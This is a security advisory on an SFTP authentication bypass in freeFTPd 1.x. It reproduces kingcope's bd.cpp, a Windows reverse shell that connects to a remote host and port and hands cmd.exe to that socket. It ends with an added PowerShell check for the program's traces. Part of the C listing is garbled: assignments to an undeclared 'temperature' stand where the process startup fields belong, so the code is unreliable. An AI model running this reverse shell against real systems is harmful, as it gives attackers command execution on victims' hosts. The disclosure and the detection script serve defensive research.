Affected System:
freeFTPd 1.x

Description:
freeFTPd is a free FTP+SSL/SFTP server based on WeOnlyDo FTP/SFTP.

The SFTP authentication mechanism of freeFTPd 1.0.11 and other versions has an error. Attackers can bypass the authentication process and execute arbitrary code with the permissions of the service.

<* Source: kingcope (kingcope@gmx.net)
   Link: http://secunia.com/advisories/51454/
         http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0012.html
*>

Test method:
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!

kingcope (kingcope@gmx.net) provides the following test method:

    // bd.cpp : Defines the entry point for the console application.
    //
    #include <winsock2.h>
    #include <stdio.h>
    #pragma comment(lib, "ws2_32")

    WSADATA wsaData;
    SOCKET Winsock;
    SOCKET Sock;
    struct sockaddr_in hax;
    STARTUPINFO ini_processo;
    PROCESS_INFORMATION processo_info;

    int main(int argc, char *argv[])
    {
        LPCSTR szMyUniqueNamedEvent = "sysnullevt";
        HANDLE m_hEvent = CreateEventA(NULL, TRUE, FALSE, szMyUniqueNamedEvent);

        switch (GetLastError())
        {
        // app is already running
        case ERROR_ALREADY_EXISTS:
            {
                CloseHandle(m_hEvent);
                return 0; // now exit
                break;
            }
        // this is the first instance of the app
        case ERROR_SUCCESS:
            {
                // global event created and new instance of app is running,
                // continue on, don't forget to clean up m_hEvent on exit
                break;
            }
        }

        WSAStartup(MAKEWORD(2, 2), &wsaData);
        Winsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int) NULL, (unsigned int) NULL);

        if (argc != 3) {
            fprintf(stderr, "Usage: <rhost> <rport>\n");
            exit(1);
        }

        hax.sin_family = AF_INET;
        hax.sin_port = htons(atoi(argv[2]));
        hax.sin_addr.s_addr = inet_addr(argv[1]);
        WSAConnect(Winsock, (SOCKADDR *) &hax, sizeof(hax), NULL);

        memset(&ini_processo, 0, sizeof(ini_processo));
        ini_processo.cb = sizeof(ini_processo);
        temperature = STARTF_USESTDHANDLES;
        temperature = HANDLE = (HANDLE) Winsock;
        CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, (LPSTARTUPINFOA) &ini_processo, &processo_info);

        return 0;
    }

Temporary solution:
If you cannot install a patch or upgrade immediately, NSFOCUS recommends that you take the following measures to reduce the threat:

* Stop using freeFTPd.

Vendor patch:
freeFTPd
--------
The vendor has not yet provided a patch or an upgrade. Users of this software should watch the vendor's home page for the latest version:

http://freeftpd.com/
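
An added host-triage check, not part of the original advisory or its author's code: it looks for the two artifacts the bd.cpp listing in this advisory would leave on a Windows host, the named event "sysnullevt" and a cmd.exe whose parent process has exited. The function names are hypothetical, and checking "Global\sysnullevt" assumes the program was started in session 0 by the service.

```powershell
# Added triage example, not part of the advisory. Run elevated on the freeFTPd host.
# Both indicators come from the bd.cpp listing; neither is proof of compromise.

function Test-NamedEvent {
    param([Parameter(Mandatory)][string]$Name)
    $handle = $null
    try {
        $found = [System.Threading.EventWaitHandle]::TryOpenExisting($Name, [ref]$handle)
        if ($found) { $handle.Dispose() }
        return $found
    } catch {
        # The event exists but this account may not open it: still a hit.
        if ($_.Exception.GetBaseException() -is [System.UnauthorizedAccessException]) {
            return $true
        }
        throw
    }
}

function Get-OrphanedCmd {
    $all = @(Get-CimInstance -ClassName Win32_Process)
    $byPid = @{}
    foreach ($p in $all) { $byPid[[uint32]$p.ProcessId] = $p }
    foreach ($p in ($all | Where-Object { $_.Name -ieq 'cmd.exe' })) {
        $parent = $byPid[[uint32]$p.ParentProcessId]
        # Orphan: parent PID is gone, or was reused by a process started later.
        if (-not $parent -or $parent.CreationDate -gt $p.CreationDate) {
            [pscustomobject]@{
                ProcessId = $p.ProcessId
                ParentPid = $p.ParentProcessId
                SessionId = $p.SessionId
                Started   = $p.CreationDate
                Command   = $p.CommandLine
            }
        }
    }
}

# bd.cpp holds the event only while it runs, so a miss here proves nothing.
foreach ($name in 'sysnullevt', 'Global\sysnullevt') {
    '{0,-20} present: {1}' -f $name, (Test-NamedEvent -Name $name)
}
# bd.cpp exits right after CreateProcessA, leaving cmd.exe without a live parent.
Get-OrphanedCmd | Format-Table -AutoSize
```

An orphaned cmd.exe also occurs in benign cases (for example a launcher that exits after starting a console), so treat a hit as a lead to correlate with the service's session and the host's outbound connections.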